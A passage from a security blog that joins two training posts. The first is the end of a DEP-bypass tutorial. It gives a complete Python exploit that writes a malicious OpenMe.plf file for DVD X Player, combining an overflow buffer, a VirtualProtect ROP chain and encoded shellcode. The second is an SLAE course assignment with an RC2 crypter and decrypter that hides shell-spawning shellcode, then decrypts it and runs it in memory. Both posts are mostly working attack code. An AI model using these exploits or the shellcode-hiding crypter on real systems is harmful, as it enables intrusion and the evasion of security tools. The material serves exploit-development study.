print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created. Load that shit up!"
except:
print "File cannot be created"

Attach DVD X Player to Immunity Debugger and load OpenMe.plf.

Looking at the stack, ESP points to (0x0012F428) that’s 16 bytes from EIP which makes it fairly easy to pivot from EIP back to the stack (we want to place our ROP chain pointers on the stack, remember?). Now we need to find an instruction that will tell EIP to jump to where ESP is pointing and to do that we need to first generate list of universal ROP gadgets with no bad characters.

The above command will output number of files for various purposes but we’re only interested in two, rop_chains.txt which takes care of pairing registers with arguments for VirtualProtect() and VirtualAlloc() along with their corresponding ROP gadgets, now how cool is that?! The second file is rop.txt which contain every possible ROP gadget we can use. See VirtualProtect() register setup snippet taken from rop_chains.txt.

ROP Chain setup for VirtualProtect()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
################################################################################
 
Register setup for VirtualProtect() :
--------------------------------------------
EAX = NOP (0x90909090)
ECX = lpOldProtect (ptr to W address)
EDX = NewProtect (0x40)
EBX = dwSize
ESP = lPAddress (automatic)
EBP = ReturnTo (ptr to jmp esp)
ESI = ptr to VirtualProtect()
EDI = ROP NOP (RETN)
--- alternative chain ---
EAX = ptr to &VirtualProtect()
ECX = lpOldProtect (ptr to W address)
EDX = NewProtect (0x40)
EBX = dwSize
ESP = lPAddress (automatic)
EBP = POP (skip 4 bytes)
ESI = ptr to JMP [EAX]
EDI = ROP NOP (RETN)
+ place ptr to "jmp esp" on stack, below PUSHAD
--------------------------------------------
 
 
ROP Chain for VirtualProtect() [(XP/2003 Server and up)] :
----------------------------------------------------------
 
*** [ Ruby ] ***
 
  def create_rop_chain()
 
    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets =
    [
      0x6033447a,  # POP EAX # RETN [Configuration.dll]
      0x60366238,  # ptr to &VirtualProtect() [IAT Configuration.dll]
      0x616306ed,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [EPG.dll]
      0x60366449,  # XCHG EAX,ESI # RETN [Configuration.dll]
      0x60324e9b,  # POP EBP # RETN [Configuration.dll]
      0x6035453b,  # & push esp # ret 0x10 [Configuration.dll]
      0x60332d5e,  # POP EAX # RETN [Configuration.dll]
      0xfffffdff,  # Value to negate, will become 0x00000201
      0x60352df7,  # NEG EAX # RETN [Configuration.dll]
      0x6410b090,  # XCHG EAX,EBX # RETN [NetReg.dll]
      0x603343c6,  # POP EAX # RETN [Configuration.dll]
      0xffffffc0,  # Value to negate, will become 0x00000040
      0x61627d9c,  # NEG EAX # RETN [EPG.dll]
      0x61608ba2,  # XCHG EAX,EDX # RETN [EPG.dll]
      0x6401a604,  # POP ECX # RETN [MediaPlayerCtrl.dll]
      0x6411efff,  # &Writable location [NetReg.dll]
      0x60334af6,  # POP EDI # RETN [Configuration.dll]
      0x64041804,  # RETN (ROP NOP) [MediaPlayerCtrl.dll]
      0x6403c046,  # POP EAX # RETN [MediaPlayerCtrl.dll]
      0x90909090,  # nop
      0x6031c1ce,  # PUSHAD # RETN [Configuration.dll]

Notice how the ROP gadgets were placed in prefect order to make sure registers have the intended values by the time PUSHAD gets executed. Although there are two ways you could go about setting up your ROP chain we’ll go with the first option.

NEG instruction was also used to allow the placement of negative values for NewProtect and dwSize onto the stack in order to avoid null bytes. For instance NewProtect needs value of (0x00000040) to mark the memory region where our shellcode lives as executable (PAGE_EXECUTE_READWRITE), right? so to overcome the issue (0xffffffc0) was put instead and then NEG was used to convert it back to 0x40.

Now remember we still need to compensate for the 16 bytes gab between EIP and where ESP is pointing to, will use filler for that. I also did change dwSize value to (0x00000501) to allow for more space and swapped some of the pointers with ASCII print friendly ones as you can see in the final exploit.

Final Exploit
Python
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
#!/usr/bin/env python
 
import struct
import time
 
# bad characters "\x00\x0a\x0d\x1a\x20"
 
shellcode  = ""
shellcode += "\xba\xad\xe1\xd9\x21\xda\xd8\xd9\x74\x24\xf4\x5e\x33"
shellcode += "\xc9\xb1\x31\x83\xee\xfc\x31\x56\x0f\x03\x56\xa2\x03"
shellcode += "\x2c\xdd\x54\x41\xcf\x1e\xa4\x26\x59\xfb\x95\x66\x3d"
shellcode += "\x8f\x85\x56\x35\xdd\x29\x1c\x1b\xf6\xba\x50\xb4\xf9"
shellcode += "\x0b\xde\xe2\x34\x8c\x73\xd6\x57\x0e\x8e\x0b\xb8\x2f"
shellcode += "\x41\x5e\xb9\x68\xbc\x93\xeb\x21\xca\x06\x1c\x46\x86"
shellcode += "\x9a\x97\x14\x06\x9b\x44\xec\x29\x8a\xda\x67\x70\x0c"
shellcode += "\xdc\xa4\x08\x05\xc6\xa9\x35\xdf\x7d\x19\xc1\xde\x57"
shellcode += "\x50\x2a\x4c\x96\x5d\xd9\x8c\xde\x59\x02\xfb\x16\x9a"
shellcode += "\xbf\xfc\xec\xe1\x1b\x88\xf6\x41\xef\x2a\xd3\x70\x3c"
shellcode += "\xac\x90\x7e\x89\xba\xff\x62\x0c\x6e\x74\x9e\x85\x91"
shellcode += "\x5b\x17\xdd\xb5\x7f\x7c\x85\xd4\x26\xd8\x68\xe8\x39"
shellcode += "\x83\xd5\x4c\x31\x29\x01\xfd\x18\x27\xd4\x73\x27\x05"
shellcode += "\xd6\x8b\x28\x39\xbf\xba\xa3\xd6\xb8\x42\x66\x93\x37"
shellcode += "\x09\x2b\xb5\xdf\xd4\xb9\x84\xbd\xe6\x17\xca\xbb\x64"
shellcode += "\x92\xb2\x3f\x74\xd7\xb7\x04\x32\x0b\xc5\x15\xd7\x2b"
shellcode += "\x7a\x15\xf2\x4f\x1d\x85\x9e\xa1\xb8\x2d\x04\xbe"
 
buffer  = "\x41" * 260                      # eip offset
 
#----------------------------------------#
# ROP Chain setup for VirtualProtect()   #
#----------------------------------------#
# EAX = NOP (0x90909090)                 #
# ECX = lpOldProtect (ptr to W address)  #
# EDX = NewProtect (0x40)                #
# EBX = dwSize                           #
# ESP = lPAddress (automatic)            #
# EBP = ReturnTo (ptr to jmp esp)        #
# ESI = ptr to VirtualProtect()          #
# EDI = ROP NOP (RETN)                   #
#----------------------------------------#
buffer += struct.pack('<L', 0x6033cda2)      # POP EAX # RETN [Configuration.dll]
buffer += "MMMM"                             # compensate (filler)
buffer += "MMMM"                             # compensate (filler)
buffer += "WWWW"                             # compensate (filler)
buffer += "WWWW"                             # compensate (filler)
buffer += struct.pack('<L', 0x60366238)      # ptr to &VirtualProtect() [IAT Configuration.dll]
buffer += struct.pack('<L', 0x6410b24d)      # MOV EAX,DWORD PTR DS:[EAX] # RETN [NetReg.dll]
buffer += struct.pack('<L', 0x616385d8)      # XCHG EAX,ESI # RETN 0x00 [EPG.dll]
buffer += struct.pack('<L', 0x61626545)      # POP EBP # RETN [EPG.dll]
buffer += struct.pack('<L', 0x6035453b)      # & push esp # ret 0x10 [Configuration.dll]
buffer += struct.pack('<L', 0x64022e0f)      # POP EAX # RETN [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0xfffffaff)      # value to negate, will become 0x00000501
buffer += struct.pack('<L', 0x64037950)      # NEG EAX # RETN [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0x61640124)      # XCHG EAX,EBX # RETN [EPG.dll]
buffer += struct.pack('<L', 0x64022e0f)      # POP EAX # RETN [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0xffffffc0)      # value to negate, will become 0x00000040
buffer += struct.pack('<L', 0x64037950)      # NEG EAX # RETN [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0x61608ba2)      # XCHG EAX,EDX # RETN [EPG.dll]
buffer += struct.pack('<L', 0x603636a4)      # POP ECX # RETN [Configuration.dll]
buffer += struct.pack('<L', 0x6411cdfc)      # &Writable location [NetReg.dll]
buffer += struct.pack('<L', 0x6162c3b0)      # POP EDI # RETN [EPG.dll]
buffer += struct.pack('<L', 0x64041804)      # RETN (ROP NOP) [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0x640390d3)      # POP EAX # RETN [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0x90909090)      # NOP
buffer += struct.pack('<L', 0x60358d9f)      # PUSHAD # RETN [Configuration.dll]
buffer += "\x90" * 20
buffer += shellcode
buffer += "\x90" * 20
buffer += "\x43" * (1500-260-(4*25)-40-len(shellcode))
 
try:
f=open("OpenMe.plf","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
time.sleep(1)
f.write(buffer)
f.close()
print "[+] File created. Load that shit up!"
except:
print "File cannot be created"

The rest of the assembly code is pretty self-explanatory. Let’s take it for test drive.

The DEP policy which was set to OptOut mode in the above demo has been successfully bypassed! To be complete I also did create an exploit for VirtuallAlloc() which can be found on my Github here.

Conclusion

I hope you’ve learned a thing or two going thru this blog post, keep in mind we’ve only scratched the surface on ROP and I’m sure there are handful of tricks and techniques that I’m not aware of yet. Finally, feel free to correct any inaccurate information I may have provided using the comment section below and wish me luck on my OSCE journey in the near future :D.

RC2 Shellcode Crypter/Decrypter in Python | Linux x86

Introduction

RC2 is a symmetric-key block cipher which was popular in the first half of the 90s of the last century. RC2 also known as ARC2 was designed by Ron Rivest of RSA Security in 1987. Without going into too much details, RC2 consist of block size and key length amongst others things more on that later. In this blog post, we’ll create RC2 shellcode crypter/decrpter to demonstrate the concept. Please note that I’m no RC2 expert and this blog post is by no means an overview of RC2 algorithm

Crypter

In order to create RC2 crypter there is couple of thing we need to figure out ahead of time. That is, key-length which can range from 8 to 1024 bits, cipher-mode which can be either ECB or CBC, and the secret key. We’ll use key length of 128-bits and CBC as cipher mode which require an Initialization Vector. Here’s code referenced from Chilkat, will use the comments section to explain the process

RC2 Crypter Python Script
Python
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
import sys
import chilkat
 
# Define RC2 parameters
crypt = chilkat.CkCrypt2()
success = crypt.UnlockComponent("Anything for 30-day trial")
if (success != True):
    print(crypt.lastErrorText())
    sys.exit()
 
crypt.put_CryptAlgorithm("rc2")                                                  # set the encryption algorithm to "rc2"
crypt.put_CipherMode("cbc")                                                      # set cipher mode to "cbc"
crypt.put_KeyLength(128)                                                         # set key length 128-bit
crypt.put_Rc2EffectiveKeyLength(128)                                             #
crypt.put_PaddingScheme(0)                                                       # take care of padding
crypt.put_EncodingMode("hex")                                                    # set encoding mode to HEX
ivHex = "0001020304050607"                                                       # setup initialization vector for CBC mode.
crypt.SetEncodedIV(ivHex,"hex")                                                  # set encoding to HEX
keyHex = "000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F"      # set secret key 128-bit
crypt.SetEncodedKey(keyHex,"hex")
 
# "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80", https://www.exploit-db.com/exploits/43735/
Encrypted_Shellcode = crypt.encryptStringENC("31c05089e2682f2f7368682f62696e89e350b00bcd80")  # encrypt shellcode in string NOT bytearray format
print "Encrypted Shellcode: " + Encrypted_Shellcode                                           # print encrypted shellcode

Note: the above shellcode basically spawn shell for us and can be found here

Let’s test it

Encryoted Shellcode
Shell
1
2
3
root@ubuntu:~# python RC2Crypter.py
Encrypted Shellcode: F6F233BA271278F19E34812CC2B7ACD19385C2E7A6D477A4C72E71BF669540944E9E36B252321DB05BD96EE0223E5481
root@ubuntu:~#

Decrypter

Hence RC2 is a symmetric-key algorithm meaning the same key is used for encryption and decryption, there is nothing much to it really other than reversing the process of encryption. All of the code used to execute shellcode at run time was referenced from here

RC2 Decrypter Python Script
Python
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
from ctypes import CDLL, c_char_p, c_void_p, memmove, cast, CFUNCTYPE
import sys
import chilkat
 
# Define RC2 parameters
crypt = chilkat.CkCrypt2()
success = crypt.UnlockComponent("Anything for 30-day trial")
if (success != True):
    print(crypt.lastErrorText())
    sys.exit()
 
crypt.put_CryptAlgorithm("rc2")                                                  # set the encryption algorithm to "rc2"
crypt.put_CipherMode("cbc")                                                      # set cipher mode to "cbc"
crypt.put_KeyLength(128)                                                         # set key length 128-bit
crypt.put_Rc2EffectiveKeyLength(128)                                             #
crypt.put_PaddingScheme(0)                                                       # take care of padding
crypt.put_EncodingMode("hex")                                                    # set encoding mode to HEX
ivHex = "0001020304050607"                                                       # setup initialization vector for CBC mode.
crypt.SetEncodedIV(ivHex,"hex")                                                  # set encoding to HEX
keyHex = "000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F"      # set secret key 128-bit
crypt.SetEncodedKey(keyHex,"hex")
 
# decrypt shellcode, paste encrypted shellcode here
Encrypted_Shellcode = "F6F233BA271278F19E34812CC2B7ACD19385C2E7A6D477A4C72E71BF669540944E9E36B252321DB05BD96EE0223E5481"
Decrypted_Shellcode = crypt.decryptStringENC(Encrypted_Shellcode)                # decrypt shellcode
 
# execute decrypted shellcode
libc = CDLL('libc.so.6')
shellcode = Decrypted_Shellcode.decode('hex')
sc = c_char_p(shellcode)
size = len(shellcode)
addr = c_void_p(libc.valloc(size))
memmove(addr, sc, size)
libc.mprotect(addr, size, 0x7)
run = cast(addr, CFUNCTYPE(c_void_p))
run()

Test it

Decrypted Shellcode
Shell
1
2
3
4
root@ubuntu:~# python RC2Decrypter.py
# id
uid=0(root) gid=0(root) groups=0(root)
#

Its demo time! we’ll use pyinstaller to compile the python script

Closing Thoughts

While researching crypters/decrypters, I found most of the blog posts out there were using C wrappers, so for the sake of not making a redundant one I decided to use python wrapper. This post marks the end of my SLAE journey in which I learned how little did I know and how much I still need to learn. Thank you Vivek Ramachandran and the people who helped make this course available! Feel free to contact me for questions using the comment section below or just tweet me @ihack4falafel .

This blog post has been created for completing the requirements of the SecurityTube Linux
Assembly Expert certification:

http://www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID:    SLAE-1115

Github Repo: https://github.com/ihack4falafel/SLAE32/tree/master/Assignment%207